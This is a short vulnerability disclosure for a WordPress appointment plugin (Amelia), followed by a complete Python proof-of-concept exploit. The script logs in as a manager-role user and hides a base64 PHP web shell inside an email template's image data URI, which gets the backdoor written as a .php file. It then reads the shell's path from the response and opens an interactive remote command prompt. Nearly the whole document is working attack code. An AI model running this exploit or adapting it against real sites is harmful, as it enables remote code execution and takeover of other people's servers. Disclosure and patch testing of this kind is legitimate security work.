The plugin stores image blobs into actual files whose extension is controlled by the user, which may lead to PHP backdoors being uploaded onto the site. This vulnerability can be exploited by logged-in users with the custom “Amelia Manager” role.
import requests
import base64
BASE_URL = "http://localhost:8000"
id = "wordpress"
pw = "wordpress"
def login(id, pw) :
sess = requests.Session()
sess.post(
BASE_URL + "/wp-login.php",
data = {
'log': id,
'pwd': pw,
'wp-submit': '%EB%A1%9C%EA%B7%B8%EC%9D%B8',
'testcookie': '1'
}
).text
return sess
def exploit(sess) :
SHELLCODE = b"<?php echo(passthru($_POST['qerogram']));?>"
payload = r'''{"id":1,"name":"customer_appointment_approved","customName":null,"status":"enabled","type":"email","entity":"appointment","time":null,"timeBefore":null,"timeAfter":null,"sendTo":"customer","subject":"%service_name% Appointment Approved",'''
payload += r'''"content":"<p>Dear <strong><img src=\"data:image/php;,''' + base64.b64encode(SHELLCODE).decode()
payload += r'''\">%customer_full_name%</strong>,</p><p><br></p><p>You have successfully scheduled <strong>%service_name%</strong> appointment with <strong>%employee_full_name%</strong>. We are waiting you at <strong>%location_address% </strong>on <strong>%appointment_date_time%</strong>.</p><p><br></p><p>Thank you for choosing our company,</p><p><strong>%company_name%</strong></p>","translations":null,"entityIds":null,"sendOnlyMe":null}'''
res = sess.post(
f"{BASE_URL}/wp-admin/admin-ajax.php?action=wpamelia_api&call=/notifications/1",
data = payload,
headers = {"Content-Type": "application/json;charset=UTF-8"}
)
SHELL_ADDR = res.json()['data']['notification']['content']
SHELL_ADDR = SHELL_ADDR[SHELL_ADDR.find('src="')+5:]
SHELL_ADDR = SHELL_ADDR[:SHELL_ADDR.find('"')]
while True :
cmd = input("$ ")
if cmd.lower() == "exit" or cmd.lower() == "quit" :
break
res = sess.post(
SHELL_ADDR,
data = {"qerogram" : cmd}
)
print(res.text)
sess = login(id,pw)
exploit(sess)